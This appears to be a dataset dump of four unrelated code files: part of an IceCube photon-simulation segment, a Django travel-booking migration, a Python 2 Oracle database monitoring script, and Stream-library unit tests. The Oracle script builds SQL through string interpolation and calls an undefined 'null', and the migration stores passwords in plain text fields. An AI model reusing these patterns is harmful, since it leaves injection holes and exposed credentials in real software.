cascade_service = LoadCascadeTables(IceModel=CascadeModel, TablePath=TablePath)
else:
cascade_service = CascadeService
else:
cascade_service = None
if HybridMode:
if OutputPhotonSeriesName is not None:
raise RuntimeError("saving photons is not supported in hybrid mode")
if UseGeant4:
raise RuntimeError("Geant4 not supported in hybrid mode")
if ((CrossoverEnergyEM is not None) or (CrossoverEnergyHadron is not None)):
raise RuntimeError("CrossoverEnergyEM or CrossoverEnergyHadron not supported in hybrid mode")
# split the MCTree into a cascade-only and a track-only version
tray.AddModule("I3MCTreeHybridSimulationSplitter", name+"_splitMCTree",
InputMCTreeName=InputMCTree,
OutputMCTreeNameTracks=InputMCTree+"Tracks",
OutputMCTreeNameCascades=InputMCTree+"Cascades")
tray.AddModule("I3TauSanitizer", name+"_sanitize_taus",
InputMCTreeName = InputMCTree+"Tracks",
OutputMCTreeName = InputMCTree+"Tracks") # overwrite the input
if not IgnoreMuons:
if UseGPUs:
DoNotParallelize=False
else:
DoNotParallelize=not UseAllCPUCores
threading.Thread(target=resetTasksetThreads,args=(os.getpid(),)).start()
logging.debug('tasksetInUse = ',tasksetInUse())
logging.debug('DoNotParallelize = ',DoNotParallelize)
# simulate tracks (with clsim)
tray.AddSegment(clsim.I3CLSimMakeHits, name+"_makeCLSimHits",
PhotonSeriesName = None,
MCTreeName = InputMCTree+"Tracks",
OutputMCTreeName = InputMCTree+"Tracks_sliced",
MCPESeriesName = OutputPESeriesMapName + "Tracks",
UseI3PropagatorService = UseI3PropagatorService,
RandomService = RandomService,
UnshadowedFraction=UnshadowedFraction,
DoNotParallelize=DoNotParallelize,
UseGeant4=False, # never use this with Geant4!
UseGPUs=UseGPUs,
UseCPUs=not UseGPUs,
IceModelLocation=clsimIceModel,
DOMOversizeFactor=DOMOversizeFactor,
UseCascadeExtension=UseCascadeExtension,
GCDFile=GCDFile,
DisableTilt=True)
tray.AddModule("Delete", name+"_cleanup_clsim_sliced_MCTree",
Keys = [InputMCTree+"Tracks_sliced"])
if not IgnoreCascades:
tray.AddModule("I3PhotonicsHitMaker", name+"_hitsFromTheTable",
CascadeService = cascade_service,
TrackService = None, # tracks are handled by clsim
UnshadowedFraction = UnshadowedFraction,
Input = InputMCTree+"Cascades",
Output = OutputPESeriesMapName + "Cascades",
RandomService = RandomService
)
MCPEsToCombine = []
if not IgnoreMuons:
MCPEsToCombine.append(OutputPESeriesMapName + "Tracks")
if not IgnoreCascades:
MCPEsToCombine.append(OutputPESeriesMapName + "Cascades")
# combine the resulting I3MCHitSeriesMaps
tray.AddModule("I3CombineMCPE", name+"_combine_pes",
InputResponses = MCPEsToCombine,
OutputResponse = OutputPESeriesMapName)
if not KeepIndividualMaps:
# delete the original maps and the split I3MCTrees
tray.AddModule("Delete", name+"_cleanup_peseriesmaps",
Keys = MCPEsToCombine)
tray.AddModule("Delete", name+"_cleanup_MCTree",
Keys=[InputMCTree+"Tracks", InputMCTree+"Cascades"])
else:
# non-hybrid clsim-only simulation
# If we're using Geant4, we do NOT want the taus to be dark.
if not UseGeant4:
tray.AddModule("I3TauSanitizer", name+"_sanitize_taus",
InputMCTreeName = InputMCTree,
OutputMCTreeName = InputMCTree) # overwrite the input
if UseGPUs:
DoNotParallelize=False
else:
DoNotParallelize=not UseAllCPUCores
threading.Thread(target=resetTasksetThreads,args=(os.getpid(),)).start()
logging.debug('tasksetInUse = %s' % tasksetInUse())
logging.debug('DoNotParallelize = %s' % DoNotParallelize)
# simulate tracks (with clsim)
tray.AddSegment(clsim.I3CLSimMakeHits, name+"_makeCLSimHits",
PhotonSeriesName = OutputPhotonSeriesName,
MCTreeName = InputMCTree,
MCPESeriesName = OutputPESeriesMapName,
UseI3PropagatorService = UseI3PropagatorService,
RandomService = RandomService,
UnshadowedFraction = UnshadowedFraction,
DoNotParallelize = DoNotParallelize,
UseGeant4=UseGeant4,
CrossoverEnergyEM=CrossoverEnergyEM,
CrossoverEnergyHadron=CrossoverEnergyHadron,
UseGPUs=UseGPUs,
UseCPUs=not UseGPUs,
DOMOversizeFactor=DOMOversizeFactor,
HoleIceParameterization=HoleIceParameterization,
IceModelLocation=clsimIceModel,
GCDFile=GCDFile,
UseCascadeExtension=UseCascadeExtension)
|
# Generated by Django 3.2.5 on 2021-11-29 18:37
from django.db import migrations, models
import django.db.models.deletion
import django.db.models.expressions
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='ADMINS',
fields=[
('adminID', models.IntegerField(primary_key=True, serialize=False, unique=True)),
('adminName', models.CharField(max_length=50)),
('password', models.CharField(max_length=50)),
],
),
migrations.CreateModel(
name='BUS',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('price', models.IntegerField()),
('numSeats', models.IntegerField()),
('numAvail', models.IntegerField()),
],
),
migrations.CreateModel(
name='CUSTOMERS',
fields=[
('custID', models.IntegerField(primary_key=True, serialize=False, unique=True)),
('custName', models.CharField(max_length=50)),
('password', models.CharField(max_length=50)),
('balance', models.IntegerField()),
],
),
migrations.CreateModel(
name='FLIGHTS',
fields=[
('flightNum', models.CharField(max_length=50, primary_key=True, serialize=False, unique=True)),
('price', models.IntegerField()),
('numSeats', models.IntegerField()),
('numAvial', models.IntegerField()),
],
),
migrations.CreateModel(
name='LOCATIONS',
fields=[
('location', models.CharField(max_length=50, primary_key=True, serialize=False, unique=True)),
('riskLevel', models.CharField(choices=[('低', '低'), ('中', '中'), ('高', '高')], default='低', max_length=50)),
],
),
migrations.CreateModel(
name='HOTELS',
fields=[
('location', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False, to='TravelBooking.locations')),
('price', models.IntegerField()),
('numRooms', models.IntegerField()),
('numAvail', models.IntegerField()),
],
),
migrations.CreateModel(
name='RES_HOTEL',
fields=[
('resvKey', models.IntegerField(primary_key=True, serialize=False, unique=True)),
('custID', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='TravelBooking.customers')),
('hotelLocation', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='TravelBooking.locations')),
],
),
migrations.CreateModel(
name='RES_FLIGHT',
fields=[
('resvKey', models.IntegerField(primary_key=True, serialize=False, unique=True)),
('custID', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='TravelBooking.customers')),
('flightNum', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='TravelBooking.flights')),
],
),
migrations.CreateModel(
name='RES_BUS',
fields=[
('resvKey', models.IntegerField(primary_key=True, serialize=False, unique=True)),
('busLocation', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='TravelBooking.locations')),
('custID', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='TravelBooking.customers')),
],
),
migrations.AddField(
model_name='flights',
name='ArivCity',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='ArivCity', to='TravelBooking.locations'),
),
migrations.AddField(
model_name='flights',
name='FromCity',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='FromCity', to='TravelBooking.locations'),
),
migrations.AddConstraint(
model_name='customers',
constraint=models.CheckConstraint(check=models.Q(('balance', django.db.models.expressions.CombinedExpression(django.db.models.expressions.F('balance'), '-', django.db.models.expressions.Value(0)))), name='check_balance'),
),
migrations.AddField(
model_name='bus',
name='location',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='TravelBooking.locations'),
),
migrations.AddConstraint(
model_name='hotels',
constraint=models.CheckConstraint(check=models.Q(('price', django.db.models.expressions.CombinedExpression(django.db.models.expressions.F('price'), '-', django.db.models.expressions.Value(0)))), name='check_h_price'),
),
migrations.AddConstraint(
model_name='flights',
constraint=models.CheckConstraint(check=models.Q(('price', django.db.models.expressions.CombinedExpression(django.db.models.expressions.F('price'), '-', django.db.models.expressions.Value(0)))), name='check_f_price'),
),
migrations.AddConstraint(
model_name='bus',
constraint=models.CheckConstraint(check=models.Q(('price', django.db.models.expressions.CombinedExpression(django.db.models.expressions.F('price'), '-', django.db.models.expressions.Value(0)))), name='check_b_price'),
),
]
|
#!/bin/env python
#-*-coding:utf-8-*-
import MySQLdb
import string
import sys
reload(sys)
sys.setdefaultencoding('utf8')
import ConfigParser
def get_item(data_dict,item):
try:
item_value = data_dict[item]
return item_value
except:
pass
def get_parameters(conn):
try:
curs=conn.cursor()
data=curs.execute('select name,value from v$parameter');
data_list=curs.fetchall()
parameters={}
for item in data_list:
parameters[item[0]] = item[1]
return parameters
except Exception,e:
print e
finally:
curs.close()
def get_sysstat(conn):
try:
curs=conn.cursor()
data=curs.execute('select name,value value from v$sysstat');
data_list=curs.fetchall()
sysstat={}
for item in data_list:
sysstat[item[0]] = item[1]
return sysstat
except Exception,e:
print e
finally:
curs.close()
def get_instance(conn,field):
try:
curs=conn.cursor()
curs.execute("select %s from v$instance" %(field) );
result = curs.fetchone()[0]
return result
except Exception,e:
result = ''
print e
finally:
curs.close()
def get_database(conn,field):
try:
curs=conn.cursor()
curs.execute("select %s from v$database" %(field) );
result = curs.fetchone()[0]
return result
except Exception,e:
result = ''
print e
finally:
curs.close()
def get_version(conn):
try:
curs=conn.cursor()
curs.execute("select product,version from product_component_version where product like '%Database%'");
result = curs.fetchone()[1]
return result
except Exception,e:
print e
finally:
curs.close()
def get_current_snap_id(conn, inst_id):
try:
curs=conn.cursor()
curs.execute("select max(snap_id) from wrm$_snapshot where instance_number = %s" %(inst_id));
result = curs.fetchone()[0]
return result
except Exception,e:
print e
finally:
curs.close()
def get_end_interval_time(conn, inst_id):
try:
curs=conn.cursor()
curs.execute("""select to_char(t.end_interval_time, 'yyyy-mm-dd hh24:mi:ss') from wrm$_snapshot t
where t.snap_id in (select max(snap_id) from wrm$_snapshot)
and t.instance_number = %s """ %(inst_id));
result = curs.fetchone()[0]
return result
except Exception,e:
print e
finally:
curs.close()
def get_sessions(conn):
try:
curs=conn.cursor()
curs.execute("select count(*) from v$session");
result = curs.fetchone()[0]
return result
except Exception,e:
return null
print e
finally:
curs.close()
def get_actives(conn):
try:
curs=conn.cursor()
curs.execute("select count(*) from v$session where STATUS='ACTIVE'");
result = curs.fetchone()[0]
return result
except Exception,e:
return null
print e
finally:
curs.close()
def get_waits(conn):
try:
curs=conn.cursor()
curs.execute("select count(*) from v$session where event like 'library%' or event like 'cursor%' or event like 'latch%' or event like 'enq%' or event like 'log file%'");
result = curs.fetchone()[0]
return result
except Exception,e:
return null
print e
finally:
curs.close()
def get_dg_stats(conn):
try:
curs=conn.cursor()
curs.execute("SELECT substr((SUBSTR(VALUE,5)),0,2)*3600 + substr((SUBSTR(VALUE,5)),4,2)*60 + substr((SUBSTR(VALUE,5)),7,2) AS seconds,VALUE FROM v$dataguard_stats a WHERE NAME ='apply lag'");
list = curs.fetchone()
if list:
result = 1
else:
result = 0
return result
except Exception,e:
return null
print e
finally:
curs.close()
def get_dg_delay(conn):
try:
curs=conn.cursor()
curs.execute("SELECT substr((SUBSTR(VALUE,5)),0,2)*3600 + substr((SUBSTR(VALUE,5)),4,2)*60 + substr((SUBSTR(VALUE,5)),7,2) AS seconds,VALUE FROM v$dataguard_stats a WHERE NAME ='apply lag'");
list = curs.fetchone()
if list:
result = list[0]
else:
result = '---'
return result
except Exception,e:
return null
print e
finally:
curs.close()
def get_sysdate(conn):
try:
curs=conn.cursor()
curs.execute("select to_char(sysdate, 'yyyymmddhh24miss') from dual");
result = curs.fetchone()[0]
return result
except Exception,e:
return null
print e
finally:
curs.close()
def get_dg_p_info(conn, dest_id):
try:
curs=conn.cursor()
curs.execute("""select *
from (select dest_id,
thread#,
sequence#+1,
archived,
applied,
current_scn,
to_char(scn_to_timestamp(current_scn), 'yyyy-mm-dd hh24:mi:ss') curr_db_time,
row_number() over(partition by thread# order by sequence# desc) rn
from v$archived_log t, v$database d
where t.dest_id = %s)
where rn = 1 """ %(dest_id));
result = curs.fetchall()
return result
except Exception,e:
return None
print e
finally:
curs.close()
def get_dg_p_info_2(conn, dest_id):
try:
curs=conn.cursor()
curs.execute("""select *
from (select t.dest_id,
transmit_mode,
thread#,
sequence#+1,
archived,
applied,
current_scn,
to_char(scn_to_timestamp(current_scn), 'yyyy-mm-dd hh24:mi:ss') curr_db_time,
row_number() over(partition by thread# order by sequence# desc) rn
from v$archived_log t, v$archive_dest a, v$database d
where t.dest_id = a.dest_id
and t.dest_id = %s)
where rn = 1 """ %(dest_id));
result = curs.fetchall()
return result
except Exception,e:
return None
print e
finally:
curs.close()
def get_log_archived_delay(conn, dest_id, thread_id):
try:
result = 0
curs=conn.cursor()
curs.execute("""select count(1) from v$archived_log where dest_id = %s and thread# = %s and archived= 'NO' group by dest_id """ %(dest_id, thread_id));
list = curs.fetchone()
if list:
result = list[0]
else:
result = 0
return result
except Exception,e:
return None
print e
finally:
curs.close()
def get_log_applied_delay(conn, dest_id, thread_id):
try:
result = 0
curs=conn.cursor()
curs.execute("""select count(1) from v$archived_log where dest_id = %s and thread# = %s and applied= 'NO' group by dest_id """ %(dest_id, thread_id));
list = curs.fetchone()
if list:
result = list[0]
else:
result = 0
return result
except Exception,e:
return None
print e
finally:
curs.close()
def get_redo_per_hour(conn):
try:
curs=conn.cursor()
curs.execute("""select to_char(first_time, 'yyyy-mm-dd hh24')||':00' key_time,
trunc(sum(blocks * block_size) / 1024 / 1024) redo_p_h
from v$archived_log
where to_char(first_time, 'yyyymmddhh24') = to_char(sysdate, 'yyyymmddhh24')
and standby_dest = 'NO'
group by to_char(first_time, 'yyyy-mm-dd hh24') """);
result = curs.fetchone()
return result
except Exception,e:
print e
return None
finally:
curs.close()
def get_db_time(conn, snap_id, inst_id):
try:
curs=conn.cursor()
curs.execute("""select snap_id, end_time, dbtime, elapsed, round(dbtime/elapsed, 2) as rate from (
select n.stat_name as name,
e.snap_id,
to_char(te.end_interval_time,'yyyy-mm-dd hh24:mi:ss') as end_time,
round((case when (e.value - b.value) > 0 then e.value - b.value else e.value end) / 1000 / 1000, 2) as dbtime,
(to_date(to_char(te.end_interval_time,'yyyy-mm-dd hh24:mi:ss'),'yyyy-mm-dd hh24:mi:ss') -
to_date(to_char(tb.end_interval_time,'yyyy-mm-dd hh24:mi:ss'),'yyyy-mm-dd hh24:mi:ss'))*86400 as elapsed
from wrh$_sys_time_model e, wrh$_sys_time_model b, wrh$_stat_name n, wrm$_snapshot tb, wrm$_snapshot te
where e.stat_id = n.stat_id
and b.stat_id = n.stat_id
and b.snap_id = e.snap_id - 1
and e.snap_id = %s
and e.snap_id = te.snap_id and e.instance_number = te.instance_number
and b.snap_id = tb.snap_id and b.instance_number = tb.instance_number
and e.instance_number=b.instance_number
and e.instance_number=%s
and n.stat_name = 'DB time') tmp """ %(snap_id, inst_id));
result = curs.fetchone()
return result
except Exception,e:
print e
return None
finally:
curs.close()
def get_dg_s_ms(conn):
try:
curs=conn.cursor()
curs.execute("""select ms.thread#,
ms.sequence#,
ms.block#,
ms.delay_mins
from v$managed_standby ms
where ms.process in ('MRP0')
and ms.sequence# <> 0 """);
result = curs.fetchone()
return result
except Exception,e:
return None
print e
finally:
curs.close()
def get_dg_s_al(conn, scn):
try:
curs=conn.cursor()
curs.execute(""" select thread#,sequence# from v$archived_log where first_change#<%s and next_change#>=%s """ %(scn,scn));
result = curs.fetchone()
return result
except Exception,e:
return None
print e
finally:
curs.close()
def get_dg_s_rate(conn):
try:
curs=conn.cursor()
curs.execute("""select *
from (select rp.sofar avg_apply_rate
from v$recovery_progress rp
where rp.item = 'Average Apply Rate'
order by start_time desc)
where rownum < 2 """);
result = curs.fetchone()
return result
except Exception,e:
return None
print e
finally:
curs.close()
def get_dg_s_mrp(conn):
try:
curs=conn.cursor()
curs.execute("""select status from gv$session where program like '%(MRP0)' """);
list = curs.fetchone()
if list:
result = 1
else:
result = 0
return result
except Exception,e:
return 0
print e
finally:
curs.close()
def get_standby_redo_count(conn):
try:
curs=conn.cursor()
curs.execute("""select count(1) from v$standby_log """);
result = curs.fetchone()[0]
return result
except Exception,e:
return 0
print e
finally:
curs.close()
def get_time_by_scn(conn, scn):
try:
result=None
curs=conn.cursor()
curs.execute("""select to_char(scn_to_timestamp(%s), 'yyyy-mm-dd hh24:mi:ss') curr_db_time from v$database """ %(scn));
res = curs.fetchone()
if res:
result = res[0]
else:
result = None
return result
except Exception,e:
#print e
return None
finally:
curs.close()
def get_time_from_restorepoint(conn, scn):
try:
result=None
curs=conn.cursor()
curs.execute("""select to_char(time, 'yyyy-mm-dd hh24:mi:ss') curr_db_time from v$restore_point where scn = %s """ %(scn));
res = curs.fetchone()
if res:
result = res[0]
else:
result = None
return result
except Exception,e:
print e
return None
finally:
curs.close()
def get_pri_id_by_server(conn, id):
try:
result=None
curs=conn.cursor()
curs.execute("""select CASE is_switch
WHEN 0 THEN standby_db_id
ELSE primary_db_id
END as sta_id
from db_cfg_oracle_dg
where primary_db_id = %s or standby_db_id = %s """ %(id, id));
res = curs.fetchone()
if res:
result = res[0]
else:
result = None
return result
except Exception,e:
print e
return None
finally:
curs.close()
def get_earliest_fbscn(conn):
try:
curs=conn.cursor()
curs.execute("""select min(scn) from v$restore_point """);
result = curs.fetchone()[0]
return result
except Exception,e:
return None
print e
finally:
curs.close()
def get_earliest_fbtime(conn,flashback_retention):
try:
curs=conn.cursor()
curs.execute("""select to_char(min(time) + 1/48, 'yyyy-mm-dd hh24:mi:ss') mintime from v$restore_point where time > sysdate -%s/24/60 """ %(flashback_retention));
mintime = curs.fetchone()
result = 'null'
if mintime[0]:
result = mintime[0]
return result
except Exception,e:
print e
return None
finally:
curs.close()
def get_last_fbtime(conn):
try:
curs=conn.cursor()
curs.execute("""select to_char(max(time), 'yyyymmddhh24miss') maxtime from v$restore_point """);
lasttime = curs.fetchone()
result = 'null'
if lasttime[0]:
result = lasttime[0]
return result
except Exception,e:
print e
return None
finally:
curs.close()
def get_flashback_space_used(conn):
try:
curs=conn.cursor()
curs.execute("""select sum(percent_space_used) from v$flash_recovery_area_usage """);
fb_space = curs.fetchone()
result = 0
if fb_space:
result = fb_space[0]
if result == '' or result is None:
result = 0
return result
except Exception,e:
print e
return None
finally:
curs.close()
def get_restorepoint(conn, flashback_retention):
try:
curs=conn.cursor()
curs.execute("select name from v$restore_point where time > sysdate -%s/60/24 order by name desc " %(flashback_retention));
list = curs.fetchall()
return list
except Exception,e:
return None
print e
finally:
curs.close()
def get_expire_restore_list(conn, flashback_retention):
try:
curs=conn.cursor()
curs.execute("select name from v$restore_point where time < sysdate - %s/60/24 " %(flashback_retention));
list = curs.fetchall()
return list
except Exception,e:
return None
print e
finally:
curs.close()
def get_tablespace(conn):
try:
curs=conn.cursor()
curs.execute("""select tpsname,status,mgr,max_size,curr_size, max_used
from (SELECT d.tablespace_name tpsname,
d.status status,
d.segment_space_management mgr,
TO_CHAR(NVL(trunc(A.maxbytes / 1024 / 1024), 0), '99999990') max_size,
TO_CHAR(NVL(trunc(a.bytes / 1024 / 1024), 0), '99999990') curr_size,
TO_CHAR(NVL((a.bytes - NVL(f.bytes, 0)) / a.bytes * 100, 0),
'990D00') c_used,
TO_CHAR(NVL((a.bytes - NVL(f.bytes, 0)) / a.maxbytes * 100, 0),
'990D00') max_used
FROM sys.dba_tablespaces d,
(SELECT tablespace_name,
sum(bytes) bytes,
SUM(case autoextensible
when 'NO' then
BYTES
when 'YES' then
MAXBYTES
else
null
end) maxbytes
FROM dba_data_files
GROUP BY tablespace_name) a,
(SELECT tablespace_name,
SUM(bytes) bytes,
MAX(bytes) largest_free
FROM dba_free_space
GROUP BY tablespace_name) f
WHERE d.tablespace_name = a.tablespace_name
AND d.tablespace_name = f.tablespace_name(+))
order by max_used desc """);
list = curs.fetchall()
return list
except Exception,e:
return None
print e
finally:
curs.close()
def get_diskgroup(conn):
try:
curs=conn.cursor()
curs.execute("""select name,
state,
type,
total_mb,
free_mb,
trunc(((total_mb - free_mb) / total_mb) * 100, 2) used_rate
from v$asm_diskgroup """);
list = curs.fetchall()
return list
except Exception,e:
return None
print e
finally:
curs.close()
def get_tables(conn):
try:
curs=conn.cursor()
curs.execute("select owner, owner || '.' || table_name from dba_tables ");
list = curs.fetchall()
return list
except Exception,e:
return None
print e
finally:
curs.close()
|
from unittest import TestCase
from shared.BaseUnitTest import BaseUnitTest
from shared.products import get_products
from shared.users import get_users
import cProfile
import pstats
def profile_method(fn):
profiler = cProfile.Profile()
profiler.enable()
data = fn()
profiler.disable()
pstats.Stats(profiler).print_stats()
return data
users = [
{
"id": 1,
"first_name": "Mandy",
"last_name": "Gowan",
"email": "mgowan0@aol.com",
"gender": "Female",
"loves": ['Soccer', 'Cricket', 'Golf'],
"salary": 119885
},
{
"id": 2,
"first_name": "Janessa",
"last_name": "Cotterell",
"email": "jcotterell1@aol.com",
"gender": "Female",
"loves": ['Cricket'],
"salary": 107629
},
{
"id": 6,
"first_name": "Jasen",
"last_name": "Franzini",
"email": "jfranzini5@aol.com",
"gender": "Male",
"loves": ['Soccer', 'Golf'],
"salary": 78373
}
]
from streams.Stream import Stream
from streams.operations.operators import item
class TestStreamReadMe(BaseUnitTest):
def test_example_lambda(self):
results = list(map(lambda user: user['first_name'], filter(lambda user: user['salary'] > 100000, users)
))
# ['Mandy', 'Janessa']
print(results)
def test_example_1(self):
results = (Stream
.create(users)
.filter(lambda user: user['salary'] > 80000)
.filter(lambda product: product['gender'] == 'Female')
.map(lambda user: user['first_name'])
.asList())
# ['Mandy', 'Janessa']
print(results)
self.assertEqual(results, ['Mandy', 'Janessa'])
def test_example_1a(self):
results = (Stream
.create(users)
.filter(lambda user: user['salary'] > 80000)
.map(lambda user: user['first_name'])
.asList())
# ['Mandy', 'Janessa']
print(results)
self.assertEqual(results, ['Mandy', 'Janessa'])
def test_example_1_with_operators(self):
results = (Stream
.create(users)
.filter(item['salary'] > 80000)
.filter(item['gender'] == 'Female')
.map(item['first_name'])
.asList())
# ['Mandy', 'Janessa']
print(results)
self.assertEqual(results, ['Mandy', 'Janessa'])
def test_reduce_operator(self):
sum_of_salaries = (Stream
.create(users)
.filter(item['gender'] == 'Male')
.reduce(item['salary'].sum)
.asSingle()
)
# 78373
self.assertEqual(sum_of_salaries, 78373)
def test_flatmap_operator_loves(self):
results = (Stream
.create(users)
.flatmap(item['loves'])
.distinct()
.asList())
self.assertListEqualsInAnyOrder(results, ['Cricket', 'Golf', 'Soccer'])
def test_operator_skip_take(self):
results = (Stream
.create(users)
.skip(1)
.take(1)
.map(item['first_name'])
.asList())
self.assertListEqualsInAnyOrder(results, ['Janessa'])
# TODO Catch needs rework
# def test_operator_catch(self):
# results = (Stream
# .create(users)
# .filter(lambda user: user['gender'] == 'Male')
# .map(lambda user: user['salaryv'])
# .catchAll(lambda ex: print(ex))
# .asList()
# )
#
# self.assertListEqualsInAnyOrder(results, ['Janessa'])
def test_operator_peek(self):
results = (Stream
.create(users)
.peek(lambda data: print("User", data))
.map(item['first_name'])
.asList())
print(results)
results = (Stream
.create(users)
.peek(item.print)
.map(item['first_name'])
.asList())
self.assertListEqualsInAnyOrder(results, ['Janessa', 'Jasen', 'Mandy'])
def test_example_2(self):
results = (Stream
.create(users)
.flatmap(lambda user: user['loves'])
.distinct()
.asList())
# ['Cricket', 'Golf', 'Soccer']
print(results)
def test_example_3(self):
results = (Stream
.create(users)
.skip(1)
.take(1)
.map(lambda user: user['first_name'])
.asList())
# ['Janessa']
self.assertEqual(results, ['Janessa'])
print(results)
def test_flatmap(self):
results = (Stream
.create(users)
.flatmap(lambda user: user['loves'])
.asList())
print(results)
self.assertEqual(results, ['Soccer', 'Cricket', 'Golf', 'Cricket', 'Soccer', 'Golf'])
# ['Soccer', 'Cricket', 'Golf', 'Cricket', 'Soccer', 'Golf']
def test_fromList_with_map(self):
# filter(lambda user: user['gender'] == gender, users)
results = Stream.create(get_users()).map(lambda user: user['gender']).asList()
print("results", results)
self.assertIsNotNone(results)
self.assertEqual(results,
['Female', 'Female', 'Female', 'Female', 'Female', 'Male', 'Male', 'Male', 'Male', 'Male',
'Female', 'Male', 'Agender', 'Polygender', 'Male', 'Male', 'Polygender', 'Female', 'Male',
'Male', 'Non-binary', 'Polygender', 'Male', 'Non-binary', 'Male'])
def test_fromList_with_map_filter(self):
# filter(lambda user: user['gender'] == gender, users)
results = Stream.create(get_users()).map(lambda user: user['gender']).filter(
lambda g: g == 'Agender').asList()
print("results", results)
self.assertIsNotNone(results)
self.assertEqual(results, ['Agender'])
def test_fromList_with_map_filter_with_profile(self):
current_method = lambda: Stream.create(get_users()).map(lambda user: user['gender']).filter(
lambda g: g == 'Female').asList()
results = profile_method(current_method)
print("results", results)
self.assertIsNotNone(results)
self.assertEqual(results, ['Female', 'Female', 'Female', 'Female', 'Female', 'Female', 'Female'])
def test_fromList_with_map_filter_with_clothing_overallrating(self):
is_clothing = lambda product: product['category'] == 'Clothing'
is_rating_greater_than_three = lambda product: product['overAllRating'] > 3
name_from_product = lambda product: product['name']
current_method = lambda: (Stream.create(get_products())
.filter(is_clothing)
.filter(is_rating_greater_than_three)
.map(name_from_product)
.asList())
results = profile_method(current_method)
print("results", results)
self.assertIsNotNone(results)
self.assertEqual(results, ['Alisha Solid Women s Cycling Shorts',
'Alisha Solid Women s Cycling Shorts',
'Alisha Solid Women s Cycling Shorts',
'Alisha Solid Women s Cycling Shorts',
'Indcrown Net Embroidered Semi-stitched Lehenga Choli Material',
'Pick Pocket Embroidered Women s Waistcoat',
'Oye Boy s Dungaree',
'Mario Gotze Women s Printed Casual Orange Shirt',
'Reckler Slim Fit Men s Jeans',
'Wrangler Skanders Fit Men s Jeans',
'Roadster Skinny Fit Fit Men s Jeans'])
def test_fromList_with_map_filter_with_clothing_overallrating_get_reviews(self):
is_clothing = lambda product: product['category'] == 'Clothing'
is_rating_greater_than_three = lambda product: product['overAllRating'] > 3
reviews_from_product = lambda product: product['reviews']
rating_from_review = lambda review: review['rating']
current_method = lambda: (Stream
.create(get_products())
.filter(is_clothing)
.filter(is_rating_greater_than_three)
.flatmap(reviews_from_product)
.map(rating_from_review)
.asList())
results = profile_method(current_method)
print("results", results)
self.assertIsNotNone(results)
self.assertEqual(results, [5, 1, 2, 2, 1, 3, 2, 1, 2, 5, 1, 4, 1, 5, 5, 1])
self.assertIn(5, results)
self.assertIn(1, results)
def test_fromList_with_map_filter_with_clothing_overallrating_inter(self):
def current_method():
return list(map(lambda product: product['name'], filter(lambda product: product['overAllRating'] > 3,
filter(lambda product: product[
'category'] == 'Clothing',
get_products()))))
results = profile_method(current_method)
print("results", results)
self.assertIsNotNone(results)
self.assertEqual(results, ['Alisha Solid Women s Cycling Shorts',
'Alisha Solid Women s Cycling Shorts',
'Alisha Solid Women s Cycling Shorts',
'Alisha Solid Women s Cycling Shorts',
'Indcrown Net Embroidered Semi-stitched Lehenga Choli Material',
'Pick Pocket Embroidered Women s Waistcoat',
'Oye Boy s Dungaree',
'Mario Gotze Women s Printed Casual Orange Shirt',
'Reckler Slim Fit Men s Jeans',
'Wrangler Skanders Fit Men s Jeans',
'Roadster Skinny Fit Fit Men s Jeans'])
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.